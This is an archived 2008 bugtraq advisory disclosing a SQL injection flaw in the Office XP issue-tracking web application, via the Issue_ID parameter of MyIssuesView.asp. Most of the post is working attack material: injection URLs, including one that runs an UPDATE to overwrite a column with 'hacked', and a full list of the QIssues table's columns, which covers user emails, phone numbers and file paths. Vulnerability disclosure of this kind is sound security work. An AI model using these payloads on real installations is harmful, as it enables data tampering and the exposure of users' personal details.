[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Office XP Remote SQL Injection
From: no-reply () Aria-security ! net
Date: 2008-03-13 17:32:04
Message-ID: 20080313173204.7436.qmail () securityfocus ! com
[Download RAW message or body]
Aria-Security Team (Persian Security Network)
http://forum.Aria-Security.com (ENGLISH FORUM!)
--------------------------------------------------
Shoutz: Aura, Null, Kinglet
Office XP Remote SQL Injection
Vendor: vso-xp.com
Vulnerable File: MyIssuesView.asp
Original Adivosry: http://forum.aria-security.com/showthread.php?p=21
PoC:
MyIssuesView.asp?Issue_ID=[SQL INJECTION]
Examples:
MyIssuesView.asp?Issue_ID=-1%20having%201=1--
MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--
List of columns
QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,QIssues.Status,QIssues.C \
ategory,QIssues.Category_ID,QIssues.Status_ID,QIssues.Priority,QIssues.Staff_ID,QIssue \
s.Description,QIssues.IssueDescription,QIssues.LastStatus_ID,QIssues.UserFullName,QIss \
ues.StaffFullName,QIssues.StaffEmail,QIssues.Type,QIssues.Priority_ID,QIssues.Group_ID \
,QIssues.UserEmail,QIssues.GroupName,QIssues.UserPhone,QIssues.CloseDate,QIssues.Brows \
erAgent,QIssues.CompanyName,QIssues.FileName,QIssues.FilePath,QIssues.CustomFields,QIssues.CloseBy,QIssues.Age
Aria-Security Team
The-0utl4w
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic